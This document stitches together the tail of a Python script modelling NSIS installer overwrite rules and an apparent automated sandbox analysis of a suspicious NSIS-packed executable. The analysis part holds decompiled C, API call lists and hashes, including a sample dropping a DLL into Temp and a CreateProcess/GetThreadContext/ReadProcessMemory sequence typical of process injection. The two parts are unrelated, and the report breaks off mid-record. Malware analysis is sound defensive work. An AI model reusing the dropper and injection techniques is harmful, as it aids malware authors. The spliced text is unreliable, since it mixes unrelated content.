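    """The path taken when the open returns INVALID_HANDLE_VALUE. A non-zero
    flag logs 'skipped' and, for 'try', bumps the script error counter; a zero
    flag shows an Abort/Retry/Ignore box and folds the answer with '- 4'.
    Returns (action, value): the error-counter increment, or EXEC_ERROR."""
    if flag != 0:
        return ("skip", 1 if flag == Overwrite.TRY else 0)
    folded = msgbox_result - 4       # IDRETRY -> 0, IDIGNORE -> 1, IDABORT -> -1
    if folded == 0:
        return ("retry", 0)
    if folded == 1:
        return ("ignore", 1)
    return ("abort", EXEC_ERROR)


def plan_extract(mode: int, existing_mtime: Optional[int], existing_attrs: int,
                 embedded_mtime: int) -> dict:
    """Everything the handler decides before it opens the output file."""
    flag = resolve_overwrite(mode, existing_mtime, embedded_mtime)
    return {
        "flag": flag,
        "disposition": creation_disposition(flag),
        "attrs_after_fixup": attributes_before_open(flag, existing_attrs),
    }


if __name__ == "__main__":
    # Existing read-only file, older than the embedded one, SetOverwrite ifnewer.
    print(plan_extract(Overwrite.IFNEWER, existing_mtime=100, existing_attrs=0x21, embedded_mtime=200))
```

Run with a few mode/timestamp combinations to see the collapse: ifnewer with an older file on disk gives flag 0 and CREATE_ALWAYS with the read-only bit stripped, the same timestamps give flag 1 and CREATE_NEW, and a missing file also gives flag 1, which still succeeds because CREATE_NEW creates it.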



















                                                                              APIs
                                                                              • lstrcatA.KERNEL32(00000000,00000000,Rcxlxosdkhvclf,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017DC
                                                                              • CompareFileTime.KERNEL32(-00000014,?,Rcxlxosdkhvclf,Rcxlxosdkhvclf,00000000,00000000,Rcxlxosdkhvclf,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401806
                                                                              • GetFileAttributesA.KERNELBASE(Rcxlxosdkhvclf,Rcxlxosdkhvclf,00000000,00000000,Rcxlxosdkhvclf,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401829
                                                                              • SetFileAttributesA.KERNELBASE(Rcxlxosdkhvclf,00000000), ref: 00401833
                                                                                • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                                                                • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078EF38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                                • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078EF38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                                • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078EF38,00789938), ref: 00404DBE
                                                                                • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                                • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                                • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                                • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: FileMessageSend$Attributeslstrcatlstrlen$CompareTextTimeWindowlstrcpyn
                                                                              • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll$Rcxlxosdkhvclf
                                                                              • API String ID: 1152937526-3363688924
                                                                              • Opcode ID: 23fd552162e1cb78e30f3aeb6829a794e94d33adf5882a54a3d0554285ad8cdc
                                                                              • Instruction ID: f975a3bedda6f2933beab8fd4359c2ae6630d988b8a67772af92d786c35f871c
                                                                              • Opcode Fuzzy Hash: 23fd552162e1cb78e30f3aeb6829a794e94d33adf5882a54a3d0554285ad8cdc
                                                                              • Instruction Fuzzy Hash: 0141E471901504BBDF117FA5CD869AF3AA9EF42328B20423BF512F11E1C73C4A41CAAD
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 95%
                                                                              			E00402EBD(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
                                                                              				struct _OVERLAPPED* _v8;
                                                                              				long _v12;
                                                                              				void* _v16;
                                                                              				long _v20;
                                                                              				long _v24;
                                                                              				intOrPtr _v28;
                                                                              				char _v92;
                                                                              				void* _t68;
                                                                              				void* _t69;
                                                                              				int _t74;
                                                                              				long _t75;
                                                                              				intOrPtr _t79;
                                                                              				long _t80;
                                                                              				void* _t82;
                                                                              				int _t84;
                                                                              				void* _t99;
                                                                              				void* _t100;
                                                                              				long _t101;
                                                                              				int _t102;
                                                                              				long _t103;
                                                                              				int _t104;
                                                                              				intOrPtr _t105;
                                                                              				long _t106;
                                                                              				void* _t107;
                                                                              
                                                                              				_t102 = _a16;
                                                                              				_t99 = _a12;
                                                                              				_v12 = _t102;
                                                                              				if(_t99 == 0) {
                                                                              					_v12 = 0x8000;
                                                                              				}
                                                                              				_v8 = 0;
                                                                              				_v16 = _t99;
                                                                              				if(_t99 == 0) {
                                                                              					_v16 = 0x78d938;
                                                                              				}
                                                                              				_t66 = _a4;
                                                                              				if(_a4 >= 0) {
                                                                              					E004030FF( *0x7a2fd8 + _t66);
                                                                              				}
                                                                              				_t68 = E004030CD( &_a16, 4); // executed
                                                                              				if(_t68 == 0) {
                                                                              					L44:
                                                                              					_push(0xfffffffd);
                                                                              					goto L45;
                                                                              				} else {
                                                                              					if((_a19 & 0x00000080) == 0) {
                                                                              						if(_t99 != 0) {
                                                                              							if(_a16 < _t102) {
                                                                              								_t102 = _a16;
                                                                              							}
                                                                              							if(E004030CD(_t99, _t102) != 0) {
                                                                              								_v8 = _t102;
                                                                              								L47:
                                                                              								return _v8;
                                                                              							} else {
                                                                              								goto L44;
                                                                              							}
                                                                              						}
                                                                              						if(_a16 <= 0) {
                                                                              							goto L47;
                                                                              						}
                                                                              						while(1) {
                                                                              							_t103 = _v12;
                                                                              							if(_a16 < _t103) {
                                                                              								_t103 = _a16;
                                                                              							}
                                                                              							if(E004030CD(0x789938, _t103) == 0) {
                                                                              								goto L44;
                                                                              							}
                                                                              							_t74 = WriteFile(_a8, 0x789938, _t103,  &_a12, 0); // executed
                                                                              							if(_t74 == 0 || _t103 != _a12) {
                                                                              								L30:
                                                                              								_push(0xfffffffe);
                                                                              								L45:
                                                                              								_pop(_t69);
                                                                              								return _t69;
                                                                              							} else {
                                                                              								_v8 = _v8 + _t103;
                                                                              								_a16 = _a16 - _t103;
                                                                              								if(_a16 > 0) {
                                                                              									continue;
                                                                              								}
                                                                              								goto L47;
                                                                              							}
                                                                              						}
                                                                              						goto L44;
                                                                              					}
                                                                              					_t75 = GetTickCount();
                                                                              					_t13 =  &_a16;
                                                                              					 *_t13 = _a16 & 0x7fffffff;
                                                                              					_v20 = _t75;
                                                                              					 *0x40b038 = 0xb;
                                                                              					 *0x40b050 = 0;
                                                                              					_a4 = _a16;
                                                                              					if( *_t13 <= 0) {
                                                                              						goto L47;
                                                                              					}
                                                                              					while(1) {
                                                                              						L10:
                                                                              						_t104 = 0x4000;
                                                                              						if(_a16 < 0x4000) {
                                                                              							_t104 = _a16;
                                                                              						}
                                                                              						if(E004030CD(0x789938, _t104) == 0) {
                                                                              							goto L44;
                                                                              						}
                                                                              						_a16 = _a16 - _t104;
                                                                              						 *0x40b028 = 0x789938;
                                                                              						 *0x40b02c = _t104;
                                                                              						while(1) {
                                                                              							_t100 = _v16;
                                                                              							 *0x40b030 = _t100;
                                                                              							 *0x40b034 = _v12;
                                                                              							_t79 = E00405D9D(0x40b028);
                                                                              							_v28 = _t79;
                                                                              							if(_t79 < 0) {
                                                                              								break;
                                                                              							}
                                                                              							_t105 =  *0x40b030; // 0x78ef38
                                                                              							_t106 = _t105 - _t100;
                                                                              							_t80 = GetTickCount();
                                                                              							_t101 = _t80;
                                                                              							if(( *0x4092a0 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
                                                                              								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                                              								_t107 = _t107 + 0xc;
                                                                              								E00404D62(0,  &_v92);
                                                                              								_v20 = _t101;
                                                                              							}
                                                                              							if(_t106 == 0) {
                                                                              								if(_a16 > 0) {
                                                                              									goto L10;
                                                                              								}
                                                                              								goto L47;
                                                                              							} else {
                                                                              								if(_a12 != 0) {
                                                                              									_v12 = _v12 - _t106;
                                                                              									_v8 = _v8 + _t106;
                                                                              									_t82 =  *0x40b030; // 0x78ef38
                                                                              									_v16 = _t82;
                                                                              									if(_v12 < 1) {
                                                                              										goto L47;
                                                                              									}
                                                                              									L25:
                                                                              									if(_v28 != 4) {
                                                                              										continue;
                                                                              									}
                                                                              									goto L47;
                                                                              								}
                                                                              								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
                                                                              								if(_t84 == 0 || _v24 != _t106) {
                                                                              									goto L30;
                                                                              								} else {
                                                                              									_v8 = _v8 + _t106;
                                                                              									goto L25;
                                                                              								}
                                                                              							}
                                                                              						}
                                                                              						_push(0xfffffffc);
                                                                              						goto L45;
                                                                              					}
                                                                              					goto L44;
                                                                              				}
                                                                              			}

                                                                              0x0040302b
                                                                              0x00403034
                                                                              0x00403037
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040303d
                                                                              0x00403041
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00403047
                                                                              0x00403011
                                                                              0x00403019
                                                                              0x00000000
                                                                              0x00403020
                                                                              0x00403020
                                                                              0x00000000
                                                                              0x00403020
                                                                              0x00403019
                                                                              0x00402ffe
                                                                              0x00403054
                                                                              0x00000000
                                                                              0x00403054
                                                                              0x00000000
                                                                              0x00402f4d

                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 00402F1F
                                                                              • GetTickCount.KERNEL32 ref: 00402FA6
                                                                              • MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00402FD3
                                                                              • wsprintfA.USER32 ref: 00402FE3
                                                                              • WriteFile.KERNELBASE(00000000,00000000,0078EF38,7FFFFFFF,00000000), ref: 00403011
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: CountTick$FileWritewsprintf
                                                                              • String ID: ... %d%%$8x
                                                                              • API String ID: 4209647438-795837185
                                                                              • Opcode ID: 200e9f51f80e72fe4fcb6a06ea592b3ad35ad2676aa37a9b98c0ec53b28c93f4
                                                                              • Instruction ID: 8577ea5e15ae9603690e1c5729624cd70e3502ed31cd2bd6b1ef147789401905
                                                                              • Opcode Fuzzy Hash: 200e9f51f80e72fe4fcb6a06ea592b3ad35ad2676aa37a9b98c0ec53b28c93f4
                                                                              • Instruction Fuzzy Hash: 9E61AB3191220AEBCF10DF65DA48A9F7BB8EB04755F10417BF911B32C0D3789A40CBAA
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 026314E4
                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02631540
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220733017.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                                                              Similarity
                                                                              • API ID: AllocCreateFileVirtual
                                                                              • String ID: c318a9ec85894c65bfe21401dced2a03
                                                                              • API String ID: 1475775534-1039402140
                                                                              • Opcode ID: f8f2436e48ae6007cc3b6c86551d00bf0c3e46f193526df9e5480f1de1160e45
                                                                              • Instruction ID: be7348bae1fa8b6e948d77a7e8d7d5f82dbd225898c7366895e6d790299ff7fb
                                                                              • Opcode Fuzzy Hash: f8f2436e48ae6007cc3b6c86551d00bf0c3e46f193526df9e5480f1de1160e45
                                                                              • Instruction Fuzzy Hash: F9E14C31D44388EDEB22DBE4DC05BEDBBB5AF05710F2440DAE608FA291D7B50A94DB19
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 026307F3
                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 026309C0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220733017.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                                                              Similarity
                                                                              • API ID: CreateFileFreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 204039940-0
                                                                              • Opcode ID: 147d44b8edf9c1b8b83a1f4fe16a49ba33ba8049b8a36b976b4db1dee66b95c3
                                                                              • Instruction ID: 9531024e130c52a6f98a0d1b75a107f93f46c0ced1a52ee971233bcf40a4c409
                                                                              • Opcode Fuzzy Hash: 147d44b8edf9c1b8b83a1f4fe16a49ba33ba8049b8a36b976b4db1dee66b95c3
                                                                              • Instruction Fuzzy Hash: B9A10030D01208EFEF12DFE4C889BADBBB2BF09315F20949AE515BA2A0D3755A55DF14
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 84%
                                                                              			E004015D5(struct _SECURITY_ATTRIBUTES* __ebx, void* __eflags) {
                                                                              				int _t19;
                                                                              				struct _SECURITY_ATTRIBUTES* _t20;
                                                                              				signed char _t22;
                                                                              				struct _SECURITY_ATTRIBUTES* _t23;
                                                                              				CHAR* _t25;
                                                                              				struct _SECURITY_ATTRIBUTES** _t27;
                                                                              				struct _SECURITY_ATTRIBUTES** _t29;
                                                                              				void* _t30;
                                                                              
                                                                              				_t23 = __ebx;
                                                                              				_t25 = E00402A9A(0xfffffff0);
                                                                              				_t27 = E0040555F(_t25);
                                                                              				if( *_t25 != __ebx && _t27 != __ebx) {
                                                                              					do {
                                                                              						_t29 = E004054F7(_t27, 0x5c);
                                                                              						 *_t29 = _t23;
                                                                              						 *((char*)(_t30 + 0xb)) =  *_t29;
                                                                              						_t19 = CreateDirectoryA(_t25, _t23); // executed
                                                                              						if(_t19 == 0) {
                                                                              							if(GetLastError() != 0xb7) {
                                                                              								L5:
                                                                              								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
                                                                              							} else {
                                                                              								_t22 = GetFileAttributesA(_t25); // executed
                                                                              								if((_t22 & 0x00000010) == 0) {
                                                                              									goto L5;
                                                                              								}
                                                                              							}
                                                                              						}
                                                                              						_t20 =  *((intOrPtr*)(_t30 + 0xb));
                                                                              						 *_t29 = _t20;
                                                                              						_t27 =  &(_t29[0]);
                                                                              					} while (_t20 != _t23);
                                                                              				}
                                                                              				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
                                                                              					_push(0xfffffff5);
                                                                              					E00401428();
                                                                              				} else {
                                                                              					E00401428(0xffffffe6);
                                                                              					E004059BF("C:\\Users\\hardz\\AppData\\Local\\Temp", _t25);
                                                                              					SetCurrentDirectoryA(_t25); // executed
                                                                              				}
                                                                              				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t30 - 4));
                                                                              				return 0;
                                                                              			}

                                                                              APIs
                                                                                • Part of subcall function 0040555F: CharNextA.USER32(00405315,?,007A0988,C:\Users\user\AppData\Local\Temp\,004055C3,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\NdBLyH2h5d.exe" ,00000000), ref: 0040556D
                                                                                • Part of subcall function 0040555F: CharNextA.USER32(00000000), ref: 00405572
                                                                                • Part of subcall function 0040555F: CharNextA.USER32(00000000), ref: 00405581
                                                                              • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401601
                                                                              • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 0040160B
                                                                              • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401619
                                                                              • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401648
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp, xrefs: 0040163D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                              • String ID: C:\Users\user\AppData\Local\Temp
                                                                              • API String ID: 3751793516-501415292
                                                                              • Opcode ID: 8ad83ee49b934180a65c3f1f2490f938aa5d6732355b324bf936fc1135f131d3
                                                                              • Instruction ID: 09f96d0d66b1181939c381e70bae2dcc986a56c468c5fc90a5c01fc4095c1b0e
                                                                              • Opcode Fuzzy Hash: 8ad83ee49b934180a65c3f1f2490f938aa5d6732355b324bf936fc1135f131d3
                                                                              • Instruction Fuzzy Hash: B2010831908181ABDB212F695D449BF7BB0DA52364B28463BF8D1B22E2C63C4946D63E
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 100%
                                                                              			E004056BF(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                                              				signed int _t11;
                                                                              				int _t14;
                                                                              				signed int _t16;
                                                                              				void* _t19;
                                                                              				CHAR* _t20;
                                                                              
                                                                              				_t20 = _a4;
                                                                              				_t19 = 0x64;
                                                                              				while(1) {
                                                                              					_t19 = _t19 - 1;
                                                                              					_a4 = 0x61736e;
                                                                              					_t11 = GetTickCount();
                                                                              					_t16 = 0x1a;
                                                                              					_a6 = _a6 + _t11 % _t16;
                                                                              					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
                                                                              					if(_t14 != 0) {
                                                                              						break;
                                                                              					}
                                                                              					if(_t19 != 0) {
                                                                              						continue;
                                                                              					}
                                                                              					 *_t20 =  *_t20 & 0x00000000;
                                                                              					return _t14;
                                                                              				}
                                                                              				return _t20;
                                                                              			}

                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 004056D2
                                                                              • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?,?,C:\Users\user\AppData\Local\Temp\,Error writing temporary file. Make sure your temp folder is valid.,00403148,"C:\Users\user\Desktop\NdBLyH2h5d.exe" ,C:\Users\user\AppData\Local\Temp\), ref: 004056EC
                                                                              Strings
                                                                              • nsa, xrefs: 004056CB
                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004056BF
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004056C2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: CountFileNameTempTick
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$nsa
                                                                              • API String ID: 1716503409-1609819632
                                                                              • Opcode ID: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
                                                                              • Instruction ID: fc1e422234f16816b4991f84e515e98fc6b5cd585f65b5bef5412ac6235d785f
                                                                              • Opcode Fuzzy Hash: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
                                                                              • Instruction Fuzzy Hash: F1F0A036748218BAE7104E55EC04B9B7FA9DF91760F14C02BFA089A1C0D6B1A95897A9
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 0263035F
                                                                              • GetThreadContext.KERNELBASE(?,00010007), ref: 02630382
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 026303A6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220733017.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                                                              Similarity
                                                                              • API ID: Process$ContextCreateMemoryReadThread
                                                                              • String ID:
                                                                              • API String ID: 2411489757-0
                                                                              • Opcode ID: c44179bce8967b620d459be839f7a9e3c0b25be658a09367740f45050a05de83
                                                                              • Instruction ID: b070f9770eba08d8261b5adf0f1dcc9ca42abdaf61ed3ae0f6373374b20f257c
                                                                              • Opcode Fuzzy Hash: c44179bce8967b620d459be839f7a9e3c0b25be658a09367740f45050a05de83
                                                                              • Instruction Fuzzy Hash: E6222571E40218EFEB25CBA4DC45BEDB7B5BF49704F20409AE618FA2A0D7709A94CF15
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 73%
                                                                              			E0040136D(signed int _a4) {
                                                                              				intOrPtr* _t8;
                                                                              				int _t10;
                                                                              				signed int _t12;
                                                                              				int _t13;
                                                                              				int _t14;
                                                                              				signed int _t21;
                                                                              				int _t24;
                                                                              				signed int _t27;
                                                                              				void* _t28;
                                                                              
                                                                              				_t27 = _a4;
                                                                              				while(_t27 >= 0) {
                                                                              					_t8 = _t27 * 0x1c +  *0x7a2fb0;
                                                                              					__eflags =  *_t8 - 1;
                                                                              					if( *_t8 == 1) {
                                                                              						break;
                                                                              					}
                                                                              					_push(_t8); // executed
                                                                              					_t10 = E00401439(); // executed
                                                                              					__eflags = _t10 - 0x7fffffff;
                                                                              					if(_t10 == 0x7fffffff) {
                                                                              						return 0x7fffffff;
                                                                              					}
                                                                              					__eflags = _t10;
                                                                              					if(__eflags < 0) {
                                                                              						_t10 = E00405936(0x7a4000 - (_t10 + 1 << 0xa), 0x7a4000);
                                                                              						__eflags = _t10;
                                                                              					}
                                                                              					if(__eflags != 0) {
                                                                              						_t12 = _t10 - 1;
                                                                              						_t21 = _t27;
                                                                              						_t27 = _t12;
                                                                              						_t13 = _t12 - _t21;
                                                                              						__eflags = _t13;
                                                                              					} else {
                                                                              						_t13 = 1;
                                                                              						_t27 = _t27 + 1;
                                                                              					}
                                                                              					__eflags =  *(_t28 + 0xc);
                                                                              					if( *(_t28 + 0xc) != 0) {
                                                                              						 *0x7a276c =  *0x7a276c + _t13;
                                                                              						_t14 =  *0x7a2754;
                                                                              						__eflags = _t14;
                                                                              						_t24 = (0 | _t14 == 0x00000000) + _t14;
                                                                              						__eflags = _t24;
                                                                              						SendMessageA( *(_t28 + 0x18), 0x402, MulDiv( *0x7a276c, 0x7530, _t24), 0);
                                                                              					}
                                                                              				}
                                                                              				return 0;
                                                                              			}

                                                                              0x0040136e
                                                                              0x004013fb
                                                                              0x00401382
                                                                              0x00401384
                                                                              0x00401387
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00401389
                                                                              0x0040138a
                                                                              0x0040138f
                                                                              0x00401394
                                                                              0x00000000
                                                                              0x00401409
                                                                              0x00401396
                                                                              0x00401398
                                                                              0x004013a6
                                                                              0x004013ab
                                                                              0x004013ab
                                                                              0x004013ad
                                                                              0x004013b5
                                                                              0x004013b6
                                                                              0x004013b8
                                                                              0x004013ba
                                                                              0x004013ba
                                                                              0x004013af
                                                                              0x004013b1
                                                                              0x004013b2
                                                                              0x004013b2
                                                                              0x004013bc
                                                                              0x004013c1
                                                                              0x004013c3
                                                                              0x004013c9
                                                                              0x004013d2
                                                                              0x004013d7
                                                                              0x004013d7
                                                                              0x004013f5
                                                                              0x004013f5
                                                                              0x004013c1
                                                                              0x00000000

                                                                              APIs
                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E5
                                                                              • SendMessageA.USER32(00000402,00000402,00000000), ref: 004013F5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: 4@
                                                                              • API String ID: 3850602802-2385517874
                                                                              • Opcode ID: a45d14e2091946de284817cfc568e15438f589f3a87ce7b3a313abe01bff308b
                                                                              • Instruction ID: c77d45609a211084429c3166b5231f0613d514cab4ec9a945a8c79bb8836a1de
                                                                              • Opcode Fuzzy Hash: a45d14e2091946de284817cfc568e15438f589f3a87ce7b3a313abe01bff308b
                                                                              • Instruction Fuzzy Hash: 9201DE726242109FE7184B39DD09B3B36D8E791314F00823EBA52E66F1E67CDC028B49
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 84%
                                                                              			E00403116(void* __eflags) {
                                                                              				void* _t2;
                                                                              				void* _t5;
                                                                              				CHAR* _t6;
                                                                              
                                                                              				_t6 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
                                                                              				E00405BFB(_t6);
                                                                              				_t2 = E00405538(_t6);
                                                                              				if(_t2 != 0) {
                                                                              					E004054CC(_t6);
                                                                              					CreateDirectoryA(_t6, 0); // executed
                                                                              					_t5 = E004056BF("\"C:\\Users\\hardz\\Desktop\\NdBLyH2h5d.exe\" ", _t6); // executed
                                                                              					return _t5;
                                                                              				} else {
                                                                              					return _t2;
                                                                              				}
                                                                              			}

                                                                              0x00403117
                                                                              0x0040311d
                                                                              0x00403123
                                                                              0x0040312a
                                                                              0x0040312f
                                                                              0x00403137
                                                                              0x00403143
                                                                              0x00403149
                                                                              0x0040312d
                                                                              0x0040312d
                                                                              0x0040312d

                                                                              APIs
                                                                                • Part of subcall function 00405BFB: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
                                                                                • Part of subcall function 00405BFB: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
                                                                                • Part of subcall function 00405BFB: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
                                                                                • Part of subcall function 00405BFB: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
                                                                              • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00403137
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: Char$Next$CreateDirectoryPrev
